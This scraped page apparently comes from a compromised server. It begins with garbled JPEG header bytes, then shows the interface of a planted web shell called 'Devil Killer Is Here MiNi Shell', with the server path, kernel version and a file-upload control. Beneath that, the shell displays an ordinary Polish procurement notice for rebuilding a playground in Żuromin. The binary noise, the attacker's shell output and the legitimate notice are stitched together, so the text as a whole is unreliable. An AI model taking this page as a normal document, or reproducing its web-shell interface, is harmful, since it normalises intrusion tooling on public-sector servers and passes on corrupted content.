JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250925/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250925/0044225901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa placu zabaw przy Placu Wolności </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina i Miasto Żuromin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130377936</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Józefa Piłsudskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żuromin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 236572558</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 236572540</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zuromin.info</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zuromin.ibip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa placu zabaw przy Placu Wolności </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f05bcefb-73c3-4fe2-963e-470dd6d07b68</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00442259</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00039144/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Przebudowa placu zabaw przy Placu Wolności</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie finansowane jest ze środków Krajowego Planu Odbudowy i Zwiększania Odporności (KPO). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zuromin.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zuromin.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.1 W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy pod adresem https://zuromin.ezamawiajacy.pl<br/>1.2 Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na stronie internetowej https://zuromin.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.<br/>Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. <br/>1.3 Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej w zakładce „Pytania i odpowiedzi”. Za datę przekazania zawiadomień oraz informacji przyjmuje się datę ich wczytania do Systemu.<br/>1.4 Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki<br/>1.5 Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji dla Wykonawców – Regulacje i procedury procesu zakupowego https://zuromin.ezamawiajacy.pl<br/>1.6 Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc ze szczególnym wskazaniem na pdf<br/>1.7 Za datę przekazania oferty, oświadczeń, wniosków, zawiadomień, informacji, dokumentów elektronicznych, lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich złożenia/wysłania na Platformie https://zuromin.ezamawiajacy.pl<br/>1.8 Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego pod numerem telefonu: +48 22 576 22 23, e-mail: oneplace@marketplanet.pl<br/>1.9 Do kontaktowania się z Wykonawcami Zamawiający upoważnia osoby: w zakresie procedury przetargowej Ewa Wnuk<br/>2. Złożenie oferty<br/>2.1 Wykonawca składa ofertę wraz z załącznikami za pośrednictwem platformy pod adresem https://zuromin.ezamawiajacy.pl w zakładce „OFERTY&#34;. Formularz oferty – zał. nr 4 do SWZ.<br/>2.2 Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Złożenie oferty wymaga od wykonawcy zarejestrowania się i zalogowania na Platformie zakupowej zamawiającego dostępnej pod adresem https://zuromin.ezamawiajacy.pl<br/>2.3 Wykonawca składa ofertę w formatach: określonych w pkt. 14.5 SWZ<br/>2.4 Oferta musi być sporządzona w języku polskim.<br/>2.5 Wczytanie oferty wraz z załącznikami następuje poprzez polecenie „Złóż ofertę&#34;. Potwierdzeniem prawidłowo złożonej Oferty jest komunikat systemowy „Oferta złożona poprawnie”. O terminie złożenia Oferty decyduje czas pełnego przeprocesowania transakcji na platformie. Po zapisaniu, plik jest w Systemie o którym mowa w pkt. 2.2 zaszyfrowany. <br/>2.6 Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać złożoną ofertę - polecenie „wycofaj ofertę” lub „Modyfikuj ofertę”<br/>Szczegółowe informacje dotyczące sposobu komunikacji określa pkt 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 i 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>- administratorem Pani/Pana danych osobowych jest Gmina i Miasto Żuromin, reprezentowana przez Burmistrza Gminy i Miasta Żuromin z siedzibą w Urzędzie: Plac Józefa Piłsudskiego 3, 09-300 Żuromin, telefon 23 657 25 58, e-mail: ugimz@zuromin.info; - inspektorem ochrony danych osobowych jest pan Paweł Modrzejewski – kontakt: telefon/ 544-544-006, adres e-mail: inspektor@kiodo.pl; <br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie: - art. 6 ust. 1 lit. c RODO tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze; w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Zagospodarowanie terenu przy szkole Podstawowej w Poniatowie” nr ZP.271.2.7.2024 prowadzonym w trybie podstawowy bez negocjacji; tj. w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji; <br/>- art. 6 ust. 1 lit. b RODO tj. przetwarzanie jest konieczne do zawarcia i/lub realizacji łączącej nas umowy (zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji), a także podjęcia czynności niezbędnych przed jej zawarciem; <br/>- art. 6 ust. 1 lit. f RODO, tj. przetwarzanie jest niezbędne dla realizacji celów wynikających z prawnie uzasadnionych interesów, którym jest prawidłowe wykonanie umowy zawartej z Administratorem oraz sprawny kontakt w celu jej wykonania, gdy stroną umowy jest inny podmiot a Państwo jesteście osobą podaną do kontaktu/reprezentacji w celu zawarcia i /lub realizacji tej umowy (państwa dane „służbowe”, m.in. imię, nazwisko, stanowisko, kontakt- mogą być przekazane przez wybranego Kontrahenta, a Państwa zwierzchnika służbowego). Na tej podstawie dane mogą być także przetwarzane w celu ewentualnego dochodzenia lub obrony przed roszczeniami;<br/>- wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej<br/>- art.6, ust.1,lit.e RODO; - w wyjątkowych przypadkach Pani/Pana dane osobowe przetwarzane są na podstawie udzielonej zgody w zakresie i celu określonym w treści zgody <br/>- art.6, ust.1 lit. a RODO. Może to dotyczyć danych kontaktowych, które podają Państwo w celu usprawnienia kontaktu, a które nie są wymagane przez przepisy (np. nr telefonu, adres email) Klauzula informacyjna z art. 13 i 14 RODO (pełna treść zawarta w pkt. 27 SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na zasadach określonych w RODO, w zależności od przesłanki przetwarzania danych, posiada Pani/Pan: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*;<br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych z zastrzeżeniem, że sprostowanie lub uzupełnienie nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub postanowień umowy w zakresie niezgodnym z ustawą Pzp ** oraz nie może naruszać integralności protokołu postępowania oraz jego załączników zgodnie z przepisami art. 76 Ustawy Pzp;<br/>− usunięcia danych – tylko na podstawie i w przypadkach wynikających z art. 17 ogólnego rozporządzenia; <br/>− na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do przenoszenia danych osobowych, po spełnieniu przesłanek o których mowa w art. 20 RODO; <br/>− wyrażenia sprzeciwu z powodu szczególnej sytuacji - wyłącznie na podstawie art. 21 ogólnego rozporządzenia; co do zasady nie dotyczy danych przetwarzanych na gruncie art. 6 ust. 1 lit. c RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>− cofnięcia zgody w dowolnym momencie, gdy przetwarzanie danych osobowych odbywa się na podstawie zgody (art. 6 ust. 1 lit a RODO). Cofnięcie to nie ma wpływu na zgodność przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem. Wycofania zgody można dokonać w formie mailowej, za pomocą pisma wysłanego drogą pocztową lub osobiście w Urzędzie; Co do zasady nie przekazujemy Państwa danych osobowych do Państw Trzecich. Może się zdarzyć, iż w celu realizacji naszych zadań, nasi zaufani partnerzy (np. dostawcy poczty elektronicznej) skorzystają z serwerów znajdujących się poza Europą, m.in. w USA. W tej sytuacji zapewniamy zawarcie odpowiednich umów powierzenia przetwarzania/analizę treści regulaminów, a nasi dostawcy zapewniają, że przetwarzanie odbywa się zgodnie z obowiązującymi przepisami i z zachowaniem najwyższych standardów bezpieczeństwa. Transfer danych do USA odbywa się na zasadzie nowego programu transferowego- Data Privacy Framework. W zakresie podmiotów, które nie są wpisane do programu DPF, podstawą prawną transferu będzie zobowiązanie podmiotu do stosowania postanowień standardowych klauzul wydanych na mocy decyzji wykonawczej Komisji Europejskiej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KiZP.271.2.15.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1	Przedmiotem zamówienia jest przebudowa istniejącego placu zabaw przy Placu Wolności w Żurominie. Realizacja inwestycji ma na celu stworzenie miejsca aktywnej rekreacji i zabaw, a także integracji. <br/><br/>Przedmiotowe zamówienia zakłada wydzielenie trzech stref rekreacyjnych, wyposażonych w urządzenia dostosowane do różnych kategorii wiekowych użytkowników, harmonizujące z krajobrazem zieleńca miejskiego.<br/><br/>Strefa I: starszego dziecka, w miejscu istniejącego placu zabaw, wyposażona w: <br/>- duży zestaw wielofunkcyjny z wysoką zjeżdżalnią tubową oraz niższym ślizgiem odkrytym,<br/>- kule wspinaczkowe, przypominające drzewa; <br/>- zabawki pozwalające na integrację dzieci pełnosprawnych z tymi o szczególnych potrzebach <br/>tj. huśtawkę bocianie gniazdo oraz karuzelę integracyjną; <br/>- ławki dla osób sprawujących opiekę nad dziećmi,<br/>- kosze na śmieci. <br/>Jako nawierzchnię bezpieczną zastosowano nawierzchnię z mat przerostowych. Dodatkowo plac ma okalać żywopłot z hortensji.<br/><br/><br/>Strefa II: młodszego dziecka, wyposażona w:<br/>- jeden duży wielofunkcyjny zestaw zabawowy, przyczyniający się do wszechstronnego rozwoju umiejętności ruchowych i poznawczych użytkowników,<br/>- ławki dla osób sprawujących opiekę nad dziećmi,<br/>- kosze na śmieci. <br/>Jako nawierzchnię bezpieczną zastosowano nawierzchnię piaskową. Strefę wygrodzono ogrodzeniem panelowym z dwoma furtkami. Dodatkowo wprowadzono żywopłot z hortensji.<br/><br/>Strefa III: młodzieży, wyposażona w:<br/>- altanę z wierzby wikliniarskiej,<br/>- ławki łukowe ustawione w okrąg, zapewniające możliwość organizowania spotkań towarzyskich <br/>w przestrzeni miejskiej,<br/>- kosz na śmieci.<br/>Jako nawierzchnię zastosowano nawierzchnię gruntową mineralną. <br/>Całość dopełniają nasadzenia krzewów ozdobnych wzdłuż głównej alei, spajającej wszystkie strefy rekreacyjne. Na obszarze opracowania projektuje się również: parking rowerowy w południowej części zieleńca, gabloty informacyjne służące ekspozycjom edukacyjnym, domki dla owadów zawieszone na drzewach, a także kosze na śmieci, w tym jeden zestaw służący do ich segregacji.<br/><br/>Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>- dostawę i montaż urządzeń<br/>- wykonanie ogrodzenia<br/>- wykonanie nawierzchni bezpiecznej z mat przerostowych<br/>- wykonanie nawierzchni bezpiecznej z piasku<br/>- wykonanie nawierzchni gruntowej mineralnej<br/>- ustawienie obrzeży<br/>- rekultywację istniejącego trawnika<br/>- wykonanie nawierzchni z kory drzewnej<br/>- nasadzenia roślin<br/><br/><br/>Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SWZ:<br/>Zał. Nr 1 do SWZ – Projekt budowlany, projekt techniczny<br/>Zał. Nr 2 do SWZ - Przedmiar robót <br/>Zał. Nr 3 do SWZ - Specyfikacja techniczna wykonania i odbioru robót budowlanych<br/><br/>UWAGA: Załączony przedmiar robót jest materiałem pomocniczym do wyliczenia ceny ryczałtowej oferty, a ewentualne nieujęte w nich elementy robót wynikające z projektu budowlanego, projektu technicznego, Specyfikacji Technicznych nie mogą stanowić podstawy do żądania przez Wykonawcę dodatkowego wynagrodzenia.<br/><br/>Zamówienie finansowane jest ze środków Krajowego Planu Odbudowy i Zwiększania Odporności (KPO). Projekt podlega zasadzie DNSH (Do No Significant Harm – “nie czyń poważnych szkód” środowisku), co oznacza obowiązek zapewnienia, że realizacja projektu nie spowoduje istotnej szkody dla celów środowiskowych. <br/>Realizacja inwestycji musi być zgodna z zasadą DNSH – tzn. projekt nie może przewidywać działań wyrządzających poważną szkodę środowisku.<br/>Raport potwierdzający spełnienie wymagań zasady DNSH stanowi załącznik nr 12 do SWZ.<br/><br/><br/>Wszystkie urządzenia muszą posiadać odpowiednie certyfikaty zgodności z polskimi normami, karty techniczne urządzeń. Urządzenia muszą spełnić minimalne wymagania Zamawiającego, a w skład wymaganego przez Zamawiającego zestawu zabawowego muszą wchodzić wszystkie elementy zgodnie z przedstawionym opisem. Zamawiający dopuszcza zastosowanie materiałów o lepszych parametrach technicznych, jakościowych, materiałowych, funkcjonalnych niż określone w dokumentacji przetargowej.<br/>Dopuszczalna tolerancja wymiarów +/- 2%.<br/><br/>Wykonany plac zabaw musi spełniać wymagania norm PN-EN 1176 oraz PN-EN 1177. Po zakończeniu instalacji urządzeń na placu zabaw Wykonawca musi zapewnić wykonanie kontroli pomontażowej w celu oceny zgodności z odpowiednimi częściami normy PN-EN 1176 oraz PN -EN 1177. Dokument z kontroli potwierdzającej zgodność placu zabaw lub nawierzchni z normami PN-EN – 1176 lub PN-EN 1177 musi być wystawiony przez niezależną, wyspecjalizowaną, zewnętrzną jednostką kontrolującą, która nie była bezpośrednio zaangażowana w montaż i nie jest odpowiedzialna za ewentualne prace naprawcze i związane z tym wydatki.<br/><br/>3.2	Gwarancja<br/>Wymagany okres gwarancji na przedmiot zamówienia wynosi 36 miesięcy od daty podpisania przez Strony protokołu odbioru końcowego. <br/>Uwaga: długość okresu gwarancji na przedmiot zamówienia stanowi kryterium oceny ofert). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112723-9 - Roboty w zakresie kształtowania placów zabaw</p> <p class="mb-0">45212140-9 - Obiekty rekreacyjne</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. 20 SWZ OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na roboty budowlane i wbudowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 10.1	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp 